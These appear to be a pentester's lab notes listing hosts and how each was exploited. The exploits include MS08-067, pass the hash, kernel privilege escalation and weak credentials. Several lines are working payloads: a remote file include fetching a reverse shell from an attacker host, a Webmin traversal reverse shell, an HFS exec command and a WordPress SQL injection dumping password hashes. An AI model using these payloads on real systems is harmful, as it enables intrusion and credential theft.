192.168.13.201 Windows XP client SMB MS08-067
192.168.13.202 Ubuntu Server RFI - priv:Linux Kernel
<
= 2.6.34-rc3 ReiserFS xattr Privilege Escalation
192.168.13.203 Windows 2000 server WebDav
192.168.13.204 Windows 2000 server WebDav
192.168.13.205 Windows 2000 server pass the hash from 206
192.168.13.206 Windows 2000 server SMB MS08-067
192.168.13.207 Windows XP client
192.168.13.208 Linux 2.4.X server RFI - priv:Linux Kernel
<
= 2.6.34-rc3 ReiserFS xattr Privilege Escalation
192.168.13.209 OpenSolaris device tomcat - default account
192.168.13.210 Windows 2003 server coldfusion 8
192.168.13.214 Linux 3.X server
192.168.13.215 Linux redhat samba 2.2.7a
192.168.13.216 FreeBSD 7.X device csm php lite admin
192.168.13.218 Windows 2008 server
192.168.13.219 Linux 3.X server
192.168.13.220 Windows 7 client
192.168.13.221 Windows 2008 server
192.168.13.222 ExtremeXOS 12.X device Samba 2.2.3a
192.168.13.223 Windows 2008 server
192.168.13.224 embedded device LFI NIKTO - brute force : bob user bob password
192.168.13.225 Windows 2000 server telnet 192.168.13.225:123 --
>
MiniShare /windows/remote/616.c
192.168.13.226 Windows 2003 server using metasploit be fast kill python.exe and migrate the process
192.168.13.227 Windows 2000 server SMB MS08-067
192.168.13.229 Windows 2003 server SMB MS08-067
192.168.13.230 NetWare 6.X device
192.168.13.231 Windows 2003 server SMB MS08-067
192.168.13.234 Linux 2.6.X server https://www.exploit-db.com/exploits/15704/
192.168.13.235 Linux 2.6.X server http://192.168.13.235/section.php?page=http://192.168.12.137/reverse\_php.txt
192.168.13.236 embedded device
192.168.13.237 Linux 2.6.X server https://www.exploit-db.com/exploits/18650/
192.168.13.238 Linux 3.X server
192.168.13.239 Windows 2008 server ms09_050_smb2_negotiate_func_index
192.168.13.241 Linux 2.6.X server http://192.168.13.241:10000/unauthenticated/..%01/..%01/%01/..%01/..%01/..%01/..%01/..%01//tmp/perl-reverse-shell.cgi
192.168.13.242 Linux 2.6.X server alice user alice
192.168.13.244 Linux 2.6.X server
192.168.13.245 Windows 2008 server ms09_050_smb2_negotiate_func_index
192.168.13.247 Windows 2000 server
192.168.13.249 Android 2.X device FTP Pro
192.168.13.250 Windows Vista client http://192.168.13.250:9505/?search={.exec\|C:\Users\Public\Downloads\crypt.exe.}
192.168.13.251 Linux 2.6.X server http://192.168.13.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group\_concat%28user\_login,0x3a,user\_pass%29+from+wp\_users%23
192.168.13.252 Linux 2.6.X server Time Sheet https://www.exploit-db.com/exploits/1518/